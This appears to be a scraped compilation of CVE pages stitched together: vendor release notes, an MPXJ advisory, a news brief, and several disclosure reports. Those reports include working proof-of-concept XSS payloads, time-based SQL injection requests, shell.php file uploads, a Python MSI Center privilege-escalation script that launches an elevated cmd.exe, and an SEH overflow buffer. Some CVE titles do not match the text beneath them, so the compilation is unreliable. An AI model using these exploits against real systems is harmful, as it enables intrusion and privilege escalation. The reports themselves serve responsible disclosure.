This update resolves a multi-factor authentication bypass attack

April 2021

Advanced Authentication 6.3 Service Pack 4 Patch 1 includes enhancements and resolves several previous issues.

Many of these improvements were made in direct response to suggestions from our customers. We thank you for your time and valuable input. We hope you continue to help us ensure that our products meet all your needs. You can post feedback in the Advanced Authentication forum on NetIQ Communities, our online community that also includes product information, blogs, and links to helpful resources. You can also post or vote the ideas of enhancement requests in the Ideas forum.

For more information about this release and for the latest release notes, see the Documentation NetIQ Advanced Authentication Documentation page.

If you have suggestions for documentation improvements, click at the bottom of the specific page in the HTML version of the documentation posted at the NetIQ Advanced Authentication Documentation page.

**1.0 What’s New?**

Advanced Authentication 6.3 Service Pack 4 Patch 1 includes the following:

*   Enhancements
    
*   Security Improvements
    
*   Software Fixes
    

**1.1 Enhancements**

This release includes the following enhancements:

Enhancement

Description

Settings to Retrieve User Groups after Authentication

The options, and are introduced in all events (existing and new events). These options allow an administrator to retrieve the list of groups a user is associated with after successfully authenticating to an event.

_NOTE:_The is enabled by default for all the events except the Authenticators Management, Smartphone Enrollment, OAuth 2.0, and SAML 2.0 events.

For more information, see Configuring an Existing Event in the Advanced Authentication - Administration guide.

Improved REST API Call to Return the DNS Name

The REST API call /api/v1/repositories has been enhanced to return the DNS name of each repository along with the repository name and repository type.

**1.2 Security Improvements**

Advanced Authentication 6.3 Service Pack 4 Patch 1 resolves a potential Multi-Factor Authentication (MFA) downgrade issue (CVE-2021-22515).

We would like to offer a special thanks to Julkair for responsibly disclosing this issue.

**1.3 Software Fixes**

This release includes the following fixes:

Component

Description

Enrollment Portal

The option for the SMS OTP and Email OTP methods is not available in the old Enrollment portal.

Enrollment Portal

When a user logs in to the old Enrollment portal by performing the basic authentication and tries to enroll the TOTP method, the QR code is not displayed.

Enrollment Portal

When a user connects the Spanish national identity card (Documento Nacional de identidad) and tries to enroll it using the PKI method, the certificate is not displayed in the field.

However, on click of , certificates are displayed. When the user selects a certificate, the following error message is displayed:

Cannot check the revocation status.

RADIUS

The RADIUS server does not return the msRADIUSFramedIPAddress attribute if the hexadecimal value of that attribute contains a negative value.

Web Authentication

When the users from LDAP repositories try to log in to the Enrollment Portal, the following error message is displayed:

WebAuth feature is not running.

This issue happens only for LDAP users who are associated with many groups and many nested groups. The local users can log in without any problem.

**2.0 Known Issues**

NetIQ Corporation strives to ensure our products provide quality solutions for your enterprise software needs. The following issues are currently being researched. If you need further assistance with any issue, please contact Technical Support.

Advanced Authentication 6.3 Service Pack 4 Patch 1 includes the following known issue:

*   Windows Client Does Not Respond
    
*   Syslog is Flooded with the Health Check Messages
    
*   Issue with Risk Service After Upgrade
    

**2.1 Windows Client Does Not Respond**

When a user tries to authenticate to Windows Client, it freezes in the Please wait screen after providing the username. This happens only in Windows machines with external Nvidia Quadro graphics cards and their drivers installed.

**2.2 Syslog is Flooded with the Health Check Messages**

There are various messages as follows:

dockerd\[2167\]: time="2020-12-21T23:30:22.663706880Z" level=warning msg="Health check for container b1cc02cc52d3fe2681c9fa60abfab62aa54fa40d4d833fca4bb0fef5d0414890 error: context deadline exceeded" in syslog.

These messages do not indicate any issues. This is due to the absence of the Risk Service license.

_Workaround:_ Perform the following steps:

1.  Log in to the Configuration Portal (:9443).
    
2.  Click and select the Risk Service then click and select .
    
3.  Click then select for Risk Service.
    

**2.3 Issue with Risk Service After Upgrade**

_Issue:_ The Risk Service does not work after upgrading to Advanced Authentication 6.3 SP4.

_Workaround:_ Run the following commands to remove the old rba\_history container and reboot the appliance:

1.  systemctl stop docker
    
2.  systemctl start docker
    
3.  docker container stop risk\_rbahistory\_1
    
4.  docker container rm risk\_rbahistory\_1
    
5.  docker rmi -f mfsecurity/rba\_history:1.0.0.2
    
6.  reboot
    
7.  Log in to the Administration portal and click > to clear the logs.
    

_NOTE:_If any command takes too long to respond or hangs, press Ctrl+C to stop and continue with the next step.

**4.0 Contact Information**

Our goal is to provide documentation that meets your needs. If you have suggestions for improvements, please email Documentation-Feedback@netiq.com. We value your input and look forward to hearing from you.

For detailed contact information, see the Support Contact Information website.

For general corporate and product information, see the NetIQ Corporate website.

For interactive conversations with your peers and NetIQ experts, become an active member of our community. The NetIQ online community provides product information, useful links to helpful resources, blogs, and social media channels.

**5.0 Legal Notice**

For information about legal notices, trademarks, disclaimers, warranties, export and other use restrictions, U.S. Government rights, patent policy, and FIPS compliance, see http://www.microfocus.com/about/legal/.

© Copyright 2021 NetIQ Corporation, a Micro Focus company. All Rights Reserved.

CVE-2022-38753: Advanced Authentication 6.3 Service Pack 4 Patch 1 Release Notes

Web-Based Student Clearance System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /Admin/add-student.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtfullname parameter.

**1\. /changepassword.php**

txtold\_password、txtnew\_password、txtconfirm\_password

**payload:**

**txtold\_password="><script>alert(1)</script><"**

**poc:**

POST /changepassword.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/changepassword.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtold\_password="><script>alert(1)</script><"

**2\. **/Admin/changepassword.php****

txtold\_password、txtnew\_password、txtconfirm\_password

**payload:**

**txtold\_password="><script>alert(1)</script><"**

POC:

POST /admin/changepassword.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/admin/index.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtold\_password="><script>alert(1)</script><"

****3./Admin/add-admin.php****

txtusername

**payload:**

txtusername="><script>alert(1)</script><"

**poc:**

POST /Admin/add-admin.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 41  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Admin/add-admin.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtusername="><script>alert(1)</script><"

****4./Admin/add-student.php****

**txtfullname**

POST /Admin/add-student.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 63  
Origin: http://localhost  
Connection: close  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtfullname="><script>alert(1)</script><"

Reference:

https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html

CVE-2022-45223: Web-Based Student Clearance System in PHP Free Source Code v1.0 — Unrestricted input leads to xss

### Impact
On Unix-like operating systems (not Windows or macos), MPXJ's use of `File.createTempFile(..)` results in temporary files being created with the permissions `-rw-r--r--`. This means that any other user on the system can read the contents of this file. When MPXJ is reading a type of schedule file which requires the creation of a temporary file or directory, a knowledgeable local user could locate these transient files while they are in use and would then be able to read the schedule being processed by MPXJ.

### Patches
The problem has been patched, MPXJ version 10.14.1 and later includes the necessary changes.

### Workarounds
Setting `java.io.tmpdir` to a directory to which only the user running the application has access will prevent other users from accessing these temporary files.

### For more information
If you have any questions or comments about this advisory:
* Open an issue in https://github.com/joniles/mpxj


**Impact**

On Unix-like operating systems (not Windows or macos), MPXJ's use of File.createTempFile(..) results in temporary files being created with the permissions -rw-r--r--. This means that any other user on the system can read the contents of this file. When MPXJ is reading a type of schedule file which requires the creation of a temporary file or directory, a knowledgeable local user could locate these transient files while they are in use and would then be able to read the schedule being processed by MPXJ.

**Patches**

The problem has been patched, MPXJ version 10.14.1 and later includes the necessary changes.

**Workarounds**

Setting java.io.tmpdir to a directory to which only the user running the application has access will prevent other users from accessing these temporary files.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in https://github.com/joniles/mpxj

**References**

*   GHSA-jf2p-4gqj-849g
*   https://nvd.nist.gov/vuln/detail/CVE-2022-41954
*   joniles/mpxj@287ad02

GHSA-jf2p-4gqj-849g: Temporary File Information Disclosure vulnerability in MPXJ

More than 1,000 systems are exposed to a campaign hunting weak Windows servers and more.

The "Bleed You" campaign is trying to take advantage of a known remote code execution (RCE) vulnerability in Windows Internet Key Exchange (IKE) Protocol Extensions, and more than 1,000 systems are unpatched and vulnerable to compromise. 

The critical flaw, tracked as CVE-2022-34721, has been under active attack since September, a new report from Cyfirma warns, affecting vulnerable Windows OS, Windows Servers, along with Windows protocol and services. Once they achieve compromise the threat actors move laterally to deploy ransomware and other malware, the team observed.

The threat actors speak Mandarin but also have ties to the Russian cybercriminals, according to Cyfirma, which adds that the attacks aren't limited to a specific sector with targets across retail, government, IT services, and more. Victims likewise were spread across a number of mostly Western countries, including Canada, the UK, and the US. 

"Attackers are actively exploiting vulnerable Windows Server machines via the IKE and AuthIP IPsec Keying Modules by exporting this bug. Users are recommended to apply patches and fixes as soon as possible to reduce the severity of exploitation of the vulnerability," Cyfirma's researchers advised. "The researchers observed that unknown hackers are sharing the exploit link on the underground forums as well." 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Cyber-Threat Group Targets Critical RCE Vulnerability in 'Bleed You' Campaign


Velneo vClient on its 28.1.3 version, could allow an attacker with knowledge of the victims's username and hashed password to spoof the victim's id against the server.



Es conveniente leer la información siguiente antes de actualizar a esta versión

**

**Información importante sobre los ejecutables de 32 bits para Windows**



**

Esta es la última versión en la que se distribuirán los ejecutables de 32 bits para Windows.

**

**Los comandos y opciones de compactar y vaciar tabla estaban disponibles solamente en servidores cloud y con suscripción (Resuelta en 32.1)**



**

**

Nuevo sistema de activación de licencias de Velneo vServer



**

A partir de la versión 32 cambia el sistema de licenciamiento y las licencias se activarán desde

Velneo vAdmin

. Haz clic

aquí

para ampliar información al respecto.

En mi Velneo, ahora verás que una licencia tiene dos códigos distintos, uno con el formato **VLS-XXXX-XXX**, que será el que se deberá usar para activarla con la versión 32 y superiores y el otro, que usaremos cuando queramos activarla en servidores de la versión 31 o anteriores, que se seguirá activando con

Velneo vActivator

.

**

A partir de esta versión todos los servidores arrancarán con protocolo VATPS



**

El

protocolo VATPS

permite establecer conexiones seguras estándar TLS/SSL lo que provee de privacidad e integridad a las comunicaciones en red entre todos los componentes de Velneo. Es decir, no solo la comunicación se envía cifrada entre los componentes, si no que es inviolable, ya que garantiza que nadie puede modificar la información que se transmite, además de garantizarnos con qué servidor nos hemos conectado.

**

Incidencia con controles dibujo en dispositivos con procesadores Apple Silicon con sistema operativo Ventura



**

Hemos detectado una incidencia que produce un efecto de ralentización del interfaz la primera vez durante unos segundos cuando visualizamos o editamos un formulario con un control dibujo/objeto dibujo. Parece una incidencia de sistema operativo, ya que este efecto se produce también en versiones anteriores ya publicadas en las que no se observaba ese comportamiento y ha comenzado a producirse tras la última actualización de macOS Ventura en equipos con procesadores Apple Silicon.

**

Mejoras de seguridad en validación de usuario y contraseña



**

Con el fin de mejorar la seguridad del

inicio de sesión

en Velneo, se evita enviar el hash de la contraseña, sustituyendo el sistema de login con uno más moderno y seguro.

En breve, aparecerá publicado en

CVE

con el fin de advertir y propiciar la actualización a esta versión.

**

Funciones remotas y compatibilidad con versiones anteriores de Velneo



**

Por defecto, un servidor de la 32 no permite recibir peticiones de ejecución de funciones remotas desde versiones anteriores. En el caso de que queramos hacer esto posible, debemos una clave beta en la máquina donde tengamos instalado el servidor de la versión 32.

Las claves beta son entradas en la rama **beta** de Velneo del registro del sistema operativo. Se recomienda generarlas desde un proceso con el comando de instrucción de proceso

Configuración de sistema: Escribir cadena de texto

para establecerlos, ejecutándolo en 3er plano. Los parámetros se resolverán como indicamos a continuación:

Configuración de sistema: Escribir cadena de texto ( "Velneo", "beta", "clave", "valor" ):

*   **Clave**: enableRetrocompatibildadFuncionesRemotas
    

*   **Valor**: 3BFD2F9B103174596FF78C23CE8DDE77EC917BEA
    

**

Rejillas: la CSS que se aplica a los ítems de rejillas, se aplican también a las columnas de campos de tipo objeto texto y objeto dibujo



**

En versiones anteriores no se aplicaban correctamente las CSS de ítem de

rejilla

en columnas de campos de tipo objeto texto enriquecido y objeto dibujo; ahora hemos mejorado la plataforma para que también las aplique.

Al aplicar el ajuste del texto (wordwrap) en una CSS, el ajuste en textos largos puede resultar distinto.

**

Cómo activar la nueva interfaz Velneo vAdmin



**

Velneo vAdmin estrena nueva interfaz. Para probarla no tienes más que

activarla

.

**

Funcionalidades no disponibles en la nueva interfaz de Velneo vAdmin y en Velneo vAdmin Web



**

*   Alta y modificación de
    
    disco
    
    .
    

**

Mejoras de rendimiento en beta



**

Si quieres disfrutar de la versión beta de estas opciones, debes activar ciertas claves beta correspondiente en el cliente (en el caso de los objetos de interfaz) y también en el servidor (en el caso de procesos).

Las claves beta son entradas en la rama **beta** de Velneo del registro del sistema operativo. Se recomienda generarlas desde un proceso con el comando de instrucción de proceso

Configuración del sistema: escribir cadena texto

para establecerlos, ejecutándolo en 1º y 3º plano según corresponda. Los parámetros se resolverán como indicamos a continuación

Configuración de sistema: Escribir cadena de texto ( "Velneo", "beta", "clave", "valor" )

Ejecutar la aplicación, lanzar el proceso en primero y/o tercer plano, según corresponda.

En el ámbito del cliente, las claves serán operativas en siguientes sesiones que se lancen del mismo.

En el ámbito del servidor, las claves serán operativas en cuanto se reinicie.

Estas son las distintas claves beta que podemos configurar:

*   ​
    
    Rejillas
    
    estándar, carga y movimiento optimizado (requiere el
    
    estilo
    
    _Optimizado_):
    
    *   **Clave**: optimizarRejillasClient
        
    
    *   **Valor**: 8DF627183E075E86BADCF82C11D4F931E8BF62D8
        
    

*   *   **Clave**: optimizarFormulariosClientFormulas
        
    
    *   **Valor**: ED979A19EEFC93EE0E4F58FB93F432BF258E1E33
        
    

*   Procesos, optimización de parámetros:
    
    *   **Clave**: optimizarInstruccion
        
    
    *   **Valor**: F15868161C0B05825E38ADE94001D5D9926CDFB7
        
    
    *   **Ámbito**: cliente y servidor.
        
    

*   *   **Valor**: 11B804B93A06DFED1838D5B21F309414B881EEDF
        
    
    *   **Ámbito**: cliente y servidor.
        
    

*   Nuevo motor
    
    Javascript
    
    con optimización de memoria y concurrencia:
    
    *   **Clave**: enableSombrasJSClass
        
    
    *   **Valor**: F0835AF8367C2AE76BC7804F8183EEB5529C5ADF
        
    
    *   **Ámbito**: cliente y servidor.
        
    

Última actualización 6mo ago

CVE-2021-45036: Notas de la versión

Poultry Farm Management System v1.0 contains a SQL injection vulnerability via the del parameter at /Redcock-Farm/farm/category.php.

**Poultry Farm Management System v1.0 by Nikhil\_B has SQL injection**

BUG\_Author: TavenLi

vendors:https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Vulnerability File: /Redcock-Farm/farm/category.php

GET parameter 'del' exists SQL injection vulnerability

Payload1: /Redcock-Farm/farm/category.php?del=a'

    GET /Redcock-Farm/farm/category.php?del=a' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An error page

Payload2: /Redcock-Farm/farm/category.php?del=a''

    GET /Redcock-Farm/farm/category.php?del=a'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An right page

Payload3: /Redcock-Farm/farm/category.php?del=a'%2b(select\*from(select(sleep(20)))a)%2b'

    GET /Redcock-Farm/farm/category.php?del=a'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

The server response time is 20 seconds

CVE-2022-44399: bug_report/SQLi-1.md at main · tavenli/bug_report

An issue in the component MSI.TerminalServer.exe of MSI Center v1.0.41.0 allows attackers to escalate privileges via a crafted TCP packet.

Missing input validation and missing authentication allow attackers with the ability to connect to TCP/IP ports on localhost:26822 (e.g. any low-privileged user space process) to download and/or launch arbitraty executables with elevated privileges.

**General**

*   Affected product: MSI Center by Micro-Star Int’l Co., Ltd.
*   Affected version: < 1.0.45.0, e.g. 1.0.41.0
*   CVE-2022-31877

**Description**

MSI Center, a tool suite provided by MSI to configure and manage MSI mainboards, includes an executable MSI.TerminalServer.exe which is installed as a privileged service by default and allows incoming TCP/IP connections on localhost:26822. Via the TCP/IP channel, in version 1.0.41.0, it accepts several JSON-formatted command packets without any authentication, including commands which download files from the web and launch executables with elevated privileges.

While these commands are meant to download and install updates of MSI Center, missing authentication allows attackers to trigger a download of arbitrary files form the web to the local file system. Missing input validation enables attackers to launch arbitrary executables, including the downloaded ones, with elevated permissions by employing path traversal techniques.

Combined, these vulnerabilities could, for example, serve as an entry point for user-space applications (like email attachments) to fully compromise a system, including installation of malware or ransomware.

**Proof of Concept**

The following simple Python example will start an elevated Administrator command prompt when executed on a machine running MSI Center.

    import socket
    import json
    
    packet = {
        "Type": "RunSetupModule",
        "Content": json.dumps({
            "Dependent": [{
                "File": "..\\..\\..\\Windows\\system32\\cmd.exe"
            }],
            "DependentIndex": 0,
            "ProgressStatus": 21
        })
    }
    
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect(('localhost', 26822))
        s.sendall(json.dumps(packet).encode('utf8'))

Similarly, an arbitray file download can be triggered via the DownloadModule packet type:

    packet = {
        "Type": "DownloadModule",
        "Content": json.dumps({
            "ProcessURL": "https://example.com/foo.exe",
            "Dependent": [{
                "File": "foo.exe"
            }],
            "DependentIndex": 0
        })
    }

**Timeline**

*   May 19, 2022: Contacted vendor with a detailed report and PoC
*   May 25, 2022: Issue partially confirmed by vendor
*   May 25, 2022: Supplied more details including screencast of PoC
*   May 27, 2022: Vendor confirms they are working on a fix
*   June 3, 2022: CVE number assigned
*   June 3, 2022: Vendor reports the issue is fixed in MSI.TerminalServer.exe 3.2022.0527.01 by introducing CA signature validation before launching executables
*   July 5, 2022: I was able to update to a recent MSI Center version and confirm the issue has been fixed (i.e. the PoC is no longer working)
*   July 8, 2022: Public disclosure

**Thank You and Side Note**

I would like to thank MSI for quickly fixing this issue. However, it was difficult to find a contact in MSI to report this issue. I would like to encourage MSI to establish and publish a process to report security vulnerabilities in their products and add an easier way to contact security, without going through various tiers of technical support first. A first step could be to set up a dedicated email address and a /.well-known/security.txt file for easily finding contact information.

CVE-2022-31877: Privilege Escalation in MSI Center – patsch.dev

AVS Audio Converter 10.3 is vulnerable to Buffer Overflow.

    # Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)# Discovered by: Yehia Elghaly - Mrvar0x# Discovered Date: 2022-10-16# Tested Version: 10.3.1.633# Tested on OS: Windows 7 Professional x86#pop+ret Address=005154E6#Message=  0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)# The only module that has SafeSEH disabled.# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | # 0x00400000 | 0x01003000 | False  | False   | False |  False   | False  |#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.#Buffer  = '\x41'* 260#nSEH    = '\x42'*4#SEH     = '\x43'*4#ESI     = 'D*44' # ESI Overwrite #buffer = "A"*260 + [nSEH] + [SEH] + "D"*44#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44# Rexploit:# Generate the 'evil.txt' payload using python 2.7.x on Linux.# Open the file 'evil.txt' Copy.# Paste at'Output Folder and click 'Browse'.#!/usr/bin/python -w  filename="evil.txt" buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44  textfile = open(filename , 'w')textfile.write(buffer)textfile.close()

CVE-2022-44283: AVS Audio Converter 10.3 Stack Overflow ≈ Packet Storm

Online Tours & Travels Management System v1.0 contains an arbitrary file upload vulnerability via /tour/admin/file.php.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels management system v1.0 by mayuri\_k has arbitrary file upload**

BUG\_Author: lcg22266

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

Vulnerability url: ip/tour/admin/file.php

Loophole location: Online Tours & Travels management system's /admin/file.php file exists arbitrary file upload

Request package for file upload:

    POST /tour/admin/file.php HTTP/1.1
    Host: localhost
    Content-Length: 320
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryX5YWsfY9nqxrRgu9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/tour/admin/file.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    
    ------WebKitFormBoundaryX5YWsfY9nqxrRgu9
    Content-Disposition: form-data; name="file"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryX5YWsfY9nqxrRgu9
    Content-Disposition: form-data; name="submit"
    
    Upload Image
    ------WebKitFormBoundaryX5YWsfY9nqxrRgu9--
    

The files will be uploaded to this directory tour\\admin\\upload

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-44401: bug_report/RCE-1.md at main · lcg-22266/bug_report

Purchase Order Management System v1.0 contains a file upload vulnerability via /purchase_order/admin/?page=system_info.

Permalink

**Purchase Order Management System v1.0 by oretnom23 has Any file upload**

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability url: /purchase\_order/admin/?page=system\_info

Request package for file upload:

    POST /purchase_order/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    Content-Length: 880
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: */*
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4kTb0mE24bRNykxY
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/purchase_order/admin/?page=system_info
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=s87kdnnrqs6s4qkbpf0vps3gi4
    Connection: close
    
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="name"
    
    s
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="short_name"
    
    b
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="company_name"
    
    v
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="company_email"
    
    d
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="company_address"
    
    e
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="img"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundary4kTb0mE24bRNykxY
    Content-Disposition: form-data; name="cover"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundary4kTb0mE24bRNykxY--
    

The file will be uploaded to the uploads directory

We visit the url of the shell.php file and find that the code has been executed

Url: http://ip/purchase\_order/uploads/1666942320\_shell.php

Tag

#windows